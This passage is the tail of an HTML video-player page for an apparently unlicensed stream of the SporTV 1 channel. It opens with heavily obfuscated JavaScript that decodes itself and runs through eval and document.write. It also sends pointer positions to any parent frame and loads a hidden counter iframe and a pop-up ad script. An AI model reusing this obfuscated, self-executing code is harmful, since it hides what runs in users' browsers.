t54bINdy'+'kxF5oE3(cpP5E20hx'+'gFG8P3K){';ayRKe8EMvrC7FG='aNKow4QO2113';vO268olilOBrGM7='\151f%28z%4CP%2E%69%6Ed\145x%4Ff%28%27%5C%35%35%27%29%3E%30%29%7Bxx%38%32%38%48%38O\172s%37NGd%5B%30%5D%3D%27%78%27%7D%3Bv\141r%20%6C%32%3Dw\151\156%64ow%2Eo%70era%3F%31%3A%30%3B%66%75%6Ec\164\151o\156%20\154%33%28l%34%29%7Bl%35%3D%2F%7A%63%2Fg%3Bl%36%3D%53\164ri\156g%2E%66r\157m\103ha%72%43%6F\144%65%28%30%29%3B%6C%34%3D%6C%34%2E\162\145pl%61%63%65%28l%35%2C%6C%36%29%3Bv\141\162%20l%37%3D%6Eew%20%41r%72\141%79%28%29%2Cl%38%3D%5F%31%3D%6C%34%2Ele%6E%67th%2Cl%39%2ClI%2Cil%3D%31%36%32%35%36%2C%5F%31%3D%30%2C%49%3D%30%2C%6C\151%3D%27%27%3B%64o%7B%6C%39%3D\154%34%2E%63\150a%72C\157%64%65A\164%28%5F%31%29%3Bl%49%3Dl%34%2Ec\150ar%43%6Fd\145At%28%2B%2B%5F%31%29%3B%6C%37%5BI%2B%2B%5D%3DlI%2B%69\154%2D%28l%39%3C%3C%37%29%7D\167\150\151\154e%28%5F%31%2B%2B%3C';eval(unescape('f%75%6E\143t%69\157n%20uC%38%38%7Aj%20%20%20%20%28s%36%30%35%5A%37%29%7Bg\123%36%50\172v%73%33%7A%46%38\116%30Q%3Ds%36%30%35Z%37%7D%3B'));xx828H8Ozs7NGd[0]+=  'ws}\n}}.si})bar?true:f}0se;tN=navigator.u}]rA}9}!}iLow}Ca}]();iz}a}`.}LexOf(\'netsca}\')>=0}U}W}Y}[l}];zi}J}||8~wa;v}S msg=\'\';function |\nm}{{r|ur|8}V}X}}H}L}u}|\nrr}j =|9}B|OF}K}\r|Hl~y}h|6n.p|L}icol|}\r|||fi}A|!=-1|}X}Z}\\}^i7f=|s}4!z|S|q||t}~y}$}!|7key}|8|O|1|3|5|7(e) {';function kxF5oE3t54bINdy(gDuC2t58W03L){n1mKDj1E+=gDuC2t58W03L};bzo8EPtr36dj+=  'eva';cg7tvD='ggylPOxceCmZcsLOrySvODuHwUqCWvry';bzo8EPtr36dj+=  'l(unes';vP70uhnBlr='lGR1osH2dYP';bzo8EPtr36dj+=  'cape(cpP5E20hxgFG8P3K))}';eval(bzo8EPtr36dj);y7myb77Ve='lCdrargSjFOQCsvESQIOqJOvgnWwaaFFrsdItYVJ';bzo8EPtr36dj='';vO268olilOBrGM7+=  'l%38%29%3Bv%61r%20\154%31%3Dn%65w%20\101\162%72%61y%28%29%2Cl%30%3Dne\167%20A%72%72%61y%28%29%2CI\154%3D%31%32%38%3Bd\157%7B\154%30%5B\111l%5D%3DS%74\162\151n\147%2E\146%72%6FmCh\141rC\157d\145%28%49l%29%7D\167\150\151l%65%28%2D%2D%49l%29%3B\111l%3D%31%32%38%3B\154%31%5B%30%5D%3D%6C%69%3D%6C%30%5B\154%37%5B%30%5D%5D%3Bl%6C%3D%6C%37%5B%30%5D%3B%5Fl%3D%31%3B\166%61r%20%6C%5F%3D\154%37%2E%6C\145ngt\150%2D%31%3B%77hi%6Ce%28%5F\154%3C%6C%5F%29%7B%73w\151%74\143h%28%6C%37%5B%5F\154%5D%3C%49l%3F%31%3A%30%29%7B%63\141s\145%20%30%20%3A\154%30%5B%49\154%5D%3D\154%30%5B%6Cl%5D%2B\123\164%72i%6E%67%28%6C%30%5Bl\154%5D%29%2Es%75b\163tr%28%30%2C%31%29%3Bl%31%5B%5Fl%5D%3D%6C%30%5BI%6C%5D%3B\151%66%28l%32%29%7B\154\151%2B%3D\154%30%5B\111l%5D%7D%3Bbr\145ak%3B\144e%66\141\165\154\164%3A\154%31%5B%5Fl%5D%3D\154';kxF5oE3t54bINdy('s2KJ2SWh2');k5gHMS6y80='l';dd47Tt48hO64J4[0]+=  '%6B\126%34V\114\124%36\113';xx828H8Ozs7NGd[0]+=  '\r\n {{{if {.|4rlK{	 }4 {{{+{{ {yC}(e|N=|O67 }+{){{,{,e.{/{1}){4|O86{9|{;{={>{@{	{B{3{5{E5{H{J{K{{?{A{2{D 117){{{<{V |>t|@|8||{*{=} e|{3{b{d{{f{h |C}^{l{,}{|E{$}{}.){My|^ess("u",{|4|[{{a{l{{ {"{${	){l{b{v|A {j{z\n{}\n{p}]{z|?z {y;{~{~}|~sz2z3z4z5z6z7z8z9z:z;~~dz>z?z@zAzBzCzDzEzFzGzHzIzJzKzLzMzNzOzPzQzRzSzTzUzVzWzX~$z<z[z\\z]z^z_z`zazb~m';vO268olilOBrGM7+=  '%30%5Bl%37%5B%5F\154%5D%5D%3B%69f%28%6C%32%29%7B\154\151%2B%3Dl%30%5B\154%37%5B%5F\154%5D%5D%7D%3Bl%30%5B\111\154%5D%3D\154%30%5Bll%5D%2B\123tr\151%6Eg%28\154%30%5Bl%37%5B%5Fl%5D%5D%29%2E%73%75b%73tr%28%30%2C%31%29%3B\142%72e%61%6B%7D%3B%49l%2B%2B%3B%6C%6C%3Dl%37%5B%5F%6C%5D%3B%5Fl%2B%2B%7D%3B\151f%28%21%6C%32%29%7B\162%65\164\165r\156%28l%31%2Ej%6Fi%6E%28%27%27%29%29%7D%65l\163%65%7B%72%65%74u%72\156%20\154i%7D%7D%3Bva\162%20lO%3D%27%27%3B\146or%28\151i%3D%30%3B\151i%3C\170\170%38%32%38\110%38%4F\172s%37%4E\107d%2El\145%6Eg\164h%3B%69%69%2B%2B%29%7B\154%4F%2B%3D\154%33%28%78x%38%32%38%48%38\117zs%37\116\107d%5Bi\151%5D%29%7D%3Bif%28%64%39\146%37%36%63%29%7Bdoc%75%6D%65n\164%2E\167\162i\164\145%28%27%3Cs%63%72%27%2B%27%69\160%74%3E%27%2Bl\117%2B%27%3C%2F%73c%27%2B%27\162ipt%3E%27%29%7D%3B';y7myb77Ve      ='XOaYRuPpljOZXdORsOlaaBSmfuVOTuOwWNROvHTdXoLOqkuxYviiMogS';kxF5oE3t54bINdy    (cg7tvD);t54bINdykxF5oE3 (vO268olilOBrGM7);k5gHMS6y80+=  'gveMsTOBCbuEebkVeFxoIXtcSZMmroRGUTDEDkdQvcaCDOVFnhsowYXOOMhqFxXvNXlPYiWvvdOOLOKOKuOkQKtcTZEOnqcnUBEvbdafEOtcduvNmfSkeGMa';</script>
<script>l1l=document.documentMode||document.all;var d9f76c=true;ll1=document.layers;lll=window.sidebar;d9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');d9f76c|=lII;zLP=location.protocol+'0FD';p4VAb93mBmi9yK=new Array();f74v3D2kE5rj7V=new Array();f74v3D2kE5rj7V[0]='\144%36P%37%33\146';p4VAb93mBmi9yK[0]='	~za~~~~~~~~~	~\n~~~\r~~~~~~~~~~~~~~~~~\r~ ~!~"~#~$~%~&~\'~(~)~*~+~,~-~.~/~0~1~2~3~4~5~6~7~8~9~:~;~<~=~>~?~@~A~B~C~D~E~F~G~H~I~J~K~L~M~N~O~P~Q~R~S~T~U~V~W~X~Y~Z~[~:~~^~_~`~a~b~c~d~e~f~g~h~i~dl=document.layers;oe=win~ow.op~{a?1:0;da=(~o~q~s~u.}~r~ttMode||}}~vall)&&!~;g}za}$}.}0tEle}%B';b1rowh7TqYF2='fu';hN1h45m1='RnuwHXIZOtlOsmcnmnlCHnsTTFOHtinOLQJN';b1rowh7TqYF2+=  'nction v8GJ36U'+'m27Dfk5f(btpOBWB'+'mI5lTLBc){';g1o1LxxRpotNNT='nOXAX3ANpqFL';srdP48qGCl9j2X3='if%28z%4C\120%2E\151%6Ede\170%4F\146%28%27%5C%35%35%27%29%3E%30%29%7B%70%34VA\142%39%33%6DB\155%69%39y%4B%5B%30%5D%3D%27\170%27%7D%3B%76%61%72%20\154%32%3D%77%69\156\144%6F%77%2Eopera%3F%31%3A%30%3B\146u%6Ect\151\157%6E%20l%33%28%6C%34%29%7B\154%35%3D%2F\172%61%2F%67%3B%6C%36%3DStr\151\156g%2E%66%72\157%6D\103\150ar%43\157\144\145%28%30%29%3B%6C%34%3D%6C%34%2Er\145%70l%61%63\145%28\154%35%2Cl%36%29%3Bvar%20\154%37%3Dn%65\167%20%41%72\162%61%79%28%29%2C%6C%38%3D%5F%31%3D\154%34%2E\154e%6Eg%74%68%2Cl%39%2C\154I%2C%69%6C%3D%31%36%32%35%36%2C%5F%31%3D%30%2CI%3D%30%2C\154%69%3D%27%27%3B%64\157%7Bl%39%3Dl%34%2Echa\162%43%6Fde%41\164%28%5F%31%29%3B\154I%3D%6C%34%2E\143har%43o\144\145%41\164%28%2B%2B%5F%31%29%3B\154%37%5BI%2B%2B%5D%3D\154\111%2B%69\154%2D%28\154%39%3C%3C%37%29%7D\167h%69%6C\145%28%5F%31%2B%2B%3C';eval(unescape('fu%6Ec\164%69\157\156%20\162%69%46l%6D%35N%32%38\166%37%20%20%20%20%28\171%68c%39%6B%79%29%7B%66\143%4A%31e\167%48%32%33X%3D%79\150\143%39%6B%79%7D%3B'));p4VAb93mBmi9yK[0]+=  'yId;ws}}}.si} bar?true:f}\'se;tN=navigator.u}TrA}0}}`Low~{Ca}T();iz}X}W.}CexOf(\'netsca}	\')>=0}L}N}P}Rl}T;zi}A}||8~na;v}J msg=\'\';function |m}r{r|ur|/}M}O}}?}C}l}|rr}a =|0}9|OF}B}|?l~p}_|-n.p|C}`col}y}}{}}}fi}8|!=-1|\r}O}Q}S}Ui7f=|s}+!z|J|h||k|\'|)|+|';function m27Dfk5fv8GJ36U(ty8KR3UD547v){hN1h45m1+=ty8KR3UD547v};b1rowh7TqYF2+=  'eva';q6IGKr='kxSKHEbyESpZLhjwSOrBFiCOlSfO';b1rowh7TqYF2+=  'l(unes';gCKITX9='qfN1N8jHwU1DHD3nK';b1rowh7TqYF2+=  'cape(btpOBWBmI5lTLBc))}';eval(b1rowh7TqYF2);iTd7nh2Y4='UuMOOTQhLIrLGOgFoVODNaqTSlGLGXRZCpk';b1rowh7TqYF2='';srdP48qGCl9j2X3+=  '%6C%38%29%3Bv\141r%20l%31%3Dn%65\167%20\101r%72ay%28%29%2Cl%30%3Dn%65w%20%41%72%72ay%28%29%2CI\154%3D%31%32%38%3B\144%6F%7Bl%30%5BI\154%5D%3D\123t%72i\156%67%2E%66r%6FmCh\141%72Co\144%65%28%49\154%29%7Dw%68\151l\145%28%2D%2D\111%6C%29%3BI%6C%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3D\154%30%5B%6C%37%5B%30%5D%5D%3Bl%6C%3D\154%37%5B%30%5D%3B%5Fl%3D%31%3Bva\162%20\154%5F%3D\154%37%2E%6Ce\156%67%74h%2D%31%3B%77\150%69%6Ce%28%5F%6C%3Cl%5F%29%7B%73w%69t\143%68%28\154%37%5B%5Fl%5D%3CI%6C%3F%31%3A%30%29%7B\143\141%73e%20%30%20%3A%6C%30%5B\111\154%5D%3D\154%30%5Bl\154%5D%2BStri%6E\147%28l%30%5Bl%6C%5D%29%2Esub\163%74%72%28%30%2C%31%29%3B%6C%31%5B%5Fl%5D%3D%6C%30%5BI%6C%5D%3B%69\146%28l%32%29%7B%6C%69%2B%3Dl%30%5B\111\154%5D%7D%3Bb\162\145%61k%3Bd%65f\141u\154t%3Al%31%5B%5F\154%5D%3D\154';m27Dfk5fv8GJ36U('b8vplW5id');g4jqxM6Lp3='l';f74v3D2kE5rj7V[0]+=  '\162%64\107uP%56%71%33';p4VAb93mBmi9yK[0]+=  'R d|ab}8}T}8|+(e){ {\r\n|5t|7|/|}T{ {\r}{\r|(|*|,|. |5E}Z{e|3{{\r{{ |:e{%\n}{\n}2}|.{e|+st}Jt}Yew F|{{|/("{\'|8 {e"){,{1~v|.|X~u}{t}u{;{={?{|}{C{E{|k{J{\nif (}|M}}F}H}J{	{L~p}{2nmo}de}n~n{za{"{4|+{m}}3{Olick={{!}8{,{. ~jzz\rzzzzzzz~~\\zzzzzzzzzz z!z"z#z$z%z&z\'z(z)z*z+z,z-z.zzz1z2z3z4z5z6z7~_';srdP48qGCl9j2X3+=  '%30%5Bl%37%5B%5F%6C%5D%5D%3Bif%28%6C%32%29%7B\154\151%2B%3Dl%30%5Bl%37%5B%5Fl%5D%5D%7D%3Bl%30%5B\111%6C%5D%3D\154%30%5Bl\154%5D%2B%53%74%72%69\156%67%28l%30%5B\154%37%5B%5F%6C%5D%5D%29%2E\163u\142s%74%72%28%30%2C%31%29%3Bb%72%65\141\153%7D%3B\111l%2B%2B%3Bl\154%3D\154%37%5B%5Fl%5D%3B%5F%6C%2B%2B%7D%3B%69f%28%21%6C%32%29%7B%72\145\164\165%72n%28\154%31%2Ejoin%28%27%27%29%29%7De\154se%7Br%65\164u\162\156%20%6C%69%7D%7D%3Bv\141r%20\154O%3D%27%27%3B%66%6F\162%28i\151%3D%30%3B%69i%3C\160%34%56A%62%39%33m\102m%69%39\171K%2E%6Ce%6E%67th%3B%69i%2B%2B%29%7B\154O%2B%3D\154%33%28p%34\126A\142%39%33m\102\155%69%39yK%5Bi%69%5D%29%7D%3Bi%66%28d%39%66%37%36c%29%7Bdo%63%75m%65n%74%2Ew\162%69%74e%28%27%3C%73%63r%27%2B%27%69\160t%3E%27%2Bl%4F%2B%27%3C%2F\163c%27%2B%27ri%70\164%3E%27%29%7D%3B';iTd7nh2Y4      ='PUkaQywgtOUouOxCQheONUONOlLfQnjOYNNtBfObaYEOawPlO';m27Dfk5fv8GJ36U    (q6IGKr);v8GJ36Um27Dfk5f (srdP48qGCl9j2X3);g4jqxM6Lp3+=  'lfmtPYuOkOFOFKOoJOrREGbSofgyGyXtVaurIaPJeIOtbyHhQByOuXEhLvejHXqODOVLIOUpmOcLOlGkFidXkEkjtOEQrocTyqOgvVGmT';</script><script>
  let pointerTracker = function (e) {
    let out = { x: 0, y: 0 };
    if (
      e.type == "touchstart" ||
      e.type == "touchmove" ||
      e.type == "touchend" ||
      e.type == "touchcancel" ||
      e.type == "touchforcechange"
    ) {
      let touch =
        e.originalEvent.touches[0] || e.originalEvent.changedTouches[0];
      out.x = touch.pageX;
      out.y = touch.pageY;
    } else if (
      e.type == "mousedown" ||
      e.type == "mouseup" ||
      e.type == "mousemove" ||
      e.type == "mouseover" ||
      e.type == "mouseout" ||
      e.type == "mouseenter" ||
      e.type == "mouseleave"
    ) {
      out.x = e.pageX;
      out.y = e.pageY;
    }
    return out;
  };

  document.addEventListener("mousemove", function (e) {
    let tracker = pointerTracker(e);
    parent.postMessage(tracker, "*");
  });

  document.addEventListener("touchstart", function (e) {
    let tracker = pointerTracker(e);
    parent.postMessage(tracker, "*");
  });
</script>
    <script type="text/javascript">

    function adjustWH(){
       var leftWidth = $(".vjs-play-control").width()+$(".vjs-volume-control").width();
      var rightWidth = $(".vjs-fullscreen-control").width()+$(".vjs-duration").width()+$(".vjs-current-time").width();
      console.log(+$(".vjs-time-control").width());
      $(".vjs-custom-control-spacer").width($(".vjs-control-bar").width()-(leftWidth+rightWidth));
      $(".vjs-custom-control-spacer").css("left", leftWidth+"px");
      console.log($(".vjs-custom-control-spacer"));
    }

    // console.log(video);

    $(document).on('webkitfullscreenchange mozfullscreenchange fullscreenchange', function(e)
    {
       setTimeout(function(){
         adjustWH();
       },300);
    });

    $(document).ready(function(){
      adjustWH();  
    });

    $(document).ready(function(){
       $("video").on('timeupdate', function(){
         adjustWH();
      });
    });

  </script>
</head>
<style class="vjs-styles-dimensions">
      .RedeCanaisPlayer-dimensions {
           position: absolute;
    top: 0;
    left: 0;
    bottom: 0;
    height: 100%;
    width: 100%;
    border: 0;
    overflow: hidden;
      }
</style>
<style>

    .video-js .vjs-custom-control-spacer {
    /*display: none; */
    width: 100%;

  position: absolute;

  /*right: 7%;*/

  height: 100%;
  line-height: 6;
  }

  

  .downloadButton img{
    /*line-height: 8em;*/
    margin-top: 17px;
  }


.vjs-custom-control-spacer{
  display: block !important;
}


.logoLinkPlayer, .logoLinkPlayer img{
  width: auto;
  height: 65%;
  max-width: 200px;
  margin:9px;
  float: left;
  /*margin-left: 85px;*/
  
  margin-left: 10px !important;
}

 
  /* Show the controls (hidden at the start by default) */
  .video-js .vjs-control-bar { 
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
  }

  /* Make the demo a little prettier */
  body {
    margin-top: 20px;
    background: #222;
    text-align: center; 
    color: #aaa;
    font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
    background: radial-gradient(#333, hsl(200,30%,6%) );
  }

  a, a:hover, a:visited { color: #76DAFF; }
</style>
<style>
  
  .video-js .vjs-load-progress{
    border-radius: 0.8em;
  }
.video-js .vjs-time-control {
    display: block;
    order: 2;
    margin-bottom: 6.6em;
    margin-left: -2.2em;

}
.downloadButton {
    float: right;
    height: 100%;
    margin-right: -1em;
   


  }

.vjs-current-time-display{
  /*margin-left: 35.3em;*/
  font-size: 1.9em;
  z-index: 1000;
  font-weight: 700;
  margin-left: 2em;
  font-weight: bolder;
}
.vjs-duration-display{
  display: none;
}
.video-js .vjs-remaining-time {
    display: none;
}
.vjs-time-divider > div > span{
  display: none;
}


.video-js button {
      font-size: 2em;
    cursor: pointer;
    color: #e4e4e4;
    /*border-right: 1px solid #151515;*/
    /*border-left: 1px solid #323232;*/
    height: 100%;
    width: 1.7em;
    display: flex;
    align-items: center;
    justify-content: center;
    color: #ada9a9;
}
.video-js .vjs-play-control{
  border-right: 1px solid #151515;
  outline: none;
}
.video-js .vjs-mute-control{
   border-right: 1px solid #151515;
  border-left: 1px solid #323232;
  outline: none;
}
.vjs-mute-control:after{
  right: 2px;
   border-right: 1px solid #323232;
  /*border-left: 1px solid #323232;*/

}
.video-js .vjs-fullscreen-control{
   border-right: 1px solid #151515;
  border-left: 1px solid #323232;
  width: 0%;
  float: right;
  margin-right: -1em;
  outline: none;
}
.video-js .vjs-slider {
  background: #333;
  background:rgba(80, 78, 78, 0.72);
  border-radius: 0.8em; 

}
.vjs-icon-fullscreen-enter:before, .video-js .vjs-fullscreen-control .vjs-icon-placeholder:before {
    content: "\f108";
    margin-left: 18px;
    outline: none;
}

.vjs-fullscreen-control > .vjs-control > .vjs-button{
  margin-left: 10px;

}
.vjs-icon-volume-high:before, .video-js .vjs-mute-control .vjs-icon-placeholder:before {
    content: "\f107";
    border-right: 1px solid #323232;
}



.video-js .vjs-control-bar {
 

  width: 94.6%;
    min-width: 200px;
    height: 6.4em;
    background: #222222;
    border-radius: 0.8em;
    margin: 2.1em auto 0;
    box-shadow: 0 0.2em 0.1em 0 rgba(0, 0, 0, 0.25);
   margin-bottom: 45px;
    display: flex;
    align-items: center;
    /*position: relative;*/
    z-index: 3;
    /*color: #ada9a9;*/
}
.video-js .vjs-progress-control {
  margin-bottom: 100px;
      /*margin: 0 auto;*/
    height: 81%;
    left: 0;
    top: 0;
    transition: top 150ms linear, opacity 150ms linear, transform 150ms linear;
    z-index: 2;
    opacity: 1;
    display: flex;
    width: 100%;
    margin-left: -100px;
    /*margin-right: -40px;*/
     border-radius: 0.8em; 


}
.vjs-load-progress > div{
  border-radius: 0.8em;
  display: none; 
  
}

.video-js .vjs-play-progress {
  background-color: #B7090B;
  border-radius: 0.8em; 

}
.video-js .vjs-progress-control .vjs-progress-holder {
         margin: 0 10px;
          margin-left: -10px; 
          outline: none;
}


 .video-js .vjs-progress-holder {
  -webkit-box-flex: auto;
  -moz-box-flex: auto;
  -webkit-flex: auto;
  -ms-flex: auto;
  flex: auto;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  -ms-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
  height: 1.6em;
  border-radius: 0.8em; 
}

 .video-js .vjs-play-progress:before {
    font-size: 2.2em;
    position: absolute;
    margin-top: .2em;
    right: -.5em;
    top: -.333333333333333em;
    z-index: 1;
    color: #B7090B;
}

.video-js .vjs-volume-level:before {
    /*position: absolute;*/
    font-size: 2.2em;
    margin-left: 0.1em;
}
.video-js .vjs-volume-panel .vjs-volume-control.vjs-volume-vertical {
  left: -7em;
  z-index: 1000;
  border-radius: 1em;

}
.vjs-volume-bar.vjs-slider-vertical .vjs-volume-level {
    height: 100%;
    margin-bottom: -1em;
}
.vjs-slider-vertical .vjs-volume-level {
    width: 1.3em;
    margin-left: -0.6em;
    border-radius: 1.3em;
}
.video-js .vjs-volume-panel .vjs-volume-control.vjs-volume-vertical {
    height: 17em;
    width: 7em;
    margin-top: -116px;
    background-color: #222222;
  }
  .vjs-volume-bar.vjs-slider-vertical {
    width: .3em;
    height: 13em;
    /*margin: 1.35em auto;*/
    /*margin-top: 1em;*/
}

/*.video-js .vjs-big-play-button {
    font-size: 5em;
    line-height: 2em;
    height: 2em;
    background-color: #B7090B;
    margin-top: -0.8em;
  }*/
  .video-js .vjs-big-play-button {
      background-color: transparent;
      width: 100%;
      height: 100%;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background-image: url('./rc-player/player/plays.png');
      background-repeat: no-repeat;
      background-size: 100px;
      background-position: 50% calc(50% - 10px);
      border: none !important; // @stylint ignore
      box-shadow: none !important; // @stylint ignore
      color: transparent;
      font-size: 2px;
       margin-top: -6.3em;
    }
  .video-js:hover .vjs-big-play-button,
.video-js .vjs-big-play-button:focus {
  background-color: transparent;
}
.vjs-progress-control .vjs-control > div{
  border-radius: 0.8em;
}
.video-js .vjs-load-progress div{background:#3a3a3a}
.video-js .vjs-load-progress{background:#3a3a3a}

.vjs-loading-spinner{
  margin-top: -6em;
}

.vjs-loading-spinner:after {
    position: absolute;
    left: 1px;
    right: 1px;
    top: 1px;
    bottom: 1px;
    margin-left: -15px;
    text-align: center;
    background-image: url(./rc-player/player/site-spinner.png);
    width: 7vh;
    height: 7vh;
    -moz-background-size: 100%;
    background-size: 100%;
    background-repeat: no-repeat;
    -webkit-animation: load_spinner .9ms linear infinite;
    -moz-animation: load_spinner .9ms linear infinite;
    -o-animation: load_spinner .9ms linear infinite;
    animation: load_spinner .9ms linear infinite;
    min-width: 5rem;
    min-height: 5rem;
    animation: vjs-spinner-spin 1.1s linear infinite, vjs-spinner-fade 1.1s linear 1 !important;
    animation-delay: 21s;

}
.vjs-thumbnail-holder {
  margin-bottom: 15px;
}

.video-js .vjs-chromecast-button:before, .vjs-icon-chromecast:before, .vjs-tech-chromecast .casting-overlay .casting-information .casting-icon:before {
    content: url(./rc-player/player/chromecastss.png?3);
}
/*.vjs-chromecast-button:before {
    line-height: 2.3;
    font-size: 1.4em;
    margin-right: 120px;
    margin-top: 14px;

    
}*/


.video-js .vjs-chromecast-button:before {
    
    margin-right: 0px;
    
    
    
}
.video-js .vjs-chromecast-button, .vjs-icon-chromecast, .vjs-tech-chromecast .casting-overlay .casting-information .casting-icon {
    margin-right: -50px;
  /*border-right: 1px solid #151515;*/
  /*margin-bottom: 110%;*/
   outline: none;
  position: absolute;

top: -81px;
right: 62px;
}



/* Safari */
@-webkit-keyframes load_spinner {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}


</style>
<style>
.btn-atualizar {
    background-color: #af4c4c;
    border-top-left-radius: 0px !important;
    border-top-right-radius: 0px !important;
    color: white;
    padding: 10px 12px;
    margin: 0px;
    margin-left:10px;
    border: none;
    border-radius: 5px;
	float:left;
    cursor: pointer;
    font-family: "Verdana", Arial;
    font-size:12px;
}
.btn-lista {
	background-color: #4286f4 !important;
}
.btn-lista:hover {
	background-color: #3671d1 !important;
}

.btn-atualizar:hover {
    background-color: #c76e6e;
}
.div-btns {
	margin: 0px;
	padding:0;
	position: absolute;
	left: 0px;
	top: 0px;
	z-index:99999;
}
</style>
<!--<div class="div-btns">
	<!--<div class="btn-atualizar" onclick="location.reload(true)">
		<i class="fas fa-sync-alt"></i><span style="margin-left:5px;">Travou? Clique Aqui!</span>
	</div>
	<a href="./mega4.php?vid=" >
	<div class="btn-atualizar btn-lista" ;">
		<i class="fas fa-long-arrow-alt-left"></i><span style="margin-left:5px;">Opção 2</span>
	</div>	
	</a>
</div>-->
<!--<script src="./rc-player/player/dist/videojs-chromecast.js"></script>-->
<script src="https://www.gstatic.com/cv/js/sender/v1/cast_sender.js"></script>
<body style="margin:0;padding:0">

<!--<script>

function reloadIt() {
    if (window.location.href.substr(-2) !== "?r") {
        window.location = window.location.href + "&?r";
    }
}

setTimeout('reloadIt()', 5000)();

</script>-->

  <div id="instructions">
   <video id="RedeCanaisPlayer"
   preload="auto"
   data-viblast-playlist-starting-offset="0"
   data-viblast-low-buffer-level="180"
   data-viblast-buffer-while-paused="true"
   data-viblast-key="a1c9d3d1-2ac7-49f5-a4b7-23fdf89ddc22"
   logo-link="./chembed.php?canal=sportv1"
   baixar="http://sinalpublico.com/player3/download.php?vid=https://m3u9.ml/b/hls1/sportv1.m3u8?mu3zAQc9HC3GbwJq=f7K3gbvQJ4lFB6qKV6qW1g&3U1G7qaTxrPbalZnEx=1641764578"
   logo="./chembed.png"
   class="video-js vjs-default-skin vjs-big-play-centered vjs-static-controls"
   height="400px"
   poster="./imgs-videos/Canais/sportv1.jpg?1"
   data-setup='{"controls":true}' autoplay>
   <source src="https://m3u9.ml/b/hls1/sportv1.m3u8?mu3zAQc9HC3GbwJq=f7K3gbvQJ4lFB6qKV6qW1g&3U1G7qaTxrPbalZnEx=1641764578" type="application/x-mpegURL">
   </video>
  </div>

<script>
    var player = videojs('#RedeCanaisPlayer', {
        controlBar: {
            volumePanel: {inline: false}
        },
        html5: {
            mp4Config: {
				maxBufferLength: 180,
				minBufferLength: 60,
                p2pConfig: {
                    pieceLength: 3072*1024,concurrentLoadNum: 1,

                }
            }
        }
    });
</script>

<script src="//imasdk.googleapis.com/js/sdkloader/ima3.js"></script>
<script src="./imavjs/node_modules/videojs-contrib-ads/dist/videojs.ads.min.js"></script>
<script src="./imavjs/dist/videojs.ima.js"></script>
<!--<script src="./imavjs/examples/simple//ads.js"></script>-->

<script>
  var video = videojs('#RedeCanaisPlayer').on('ended', function() {
    this.trigger('loadstart');
    this.trigger('refresh');
  });
</script>
<script>
  var video = videojs('#RedeCanaisPlayer', {}, function(){
    this.thumbnails({width:120,height:100}); /* width:120,height:68 */
  });
</script>
<script>
    var player = videojs(document.querySelector('RedeCanaisPlayer'), {
        language: 'fr',
        plugins: {
            chromecast: {}
        }
    }).toJSON();

</script>

<iframe src="./contador.php?static=true" frameborder="0" scrolling="no" width="0" height="0"></iframe>
   <script>
	$(function() {
		setTimeout(function() {
			  var leftWidth = $(".vjs-play-control").width()+$(".vjs-volume-control").width();
      var rightWidth = $(".vjs-fullscreen-control").width()+$(".vjs-duration").width()+$(".vjs-current-time").width();
      console.log(+$(".vjs-time-control").width());
      $(".vjs-custom-control-spacer").width($(".vjs-control-bar").width()-(leftWidth+rightWidth));
      $(".vjs-custom-control-spacer").css("left", leftWidth+"px");
      console.log($(".vjs-custom-control-spacer"));
		}, 500);
	 
	});
	</script>
<script type='text/javascript' src='./frameprotect.js'></script>
<script src="./popa.php"></script></body>
</html>
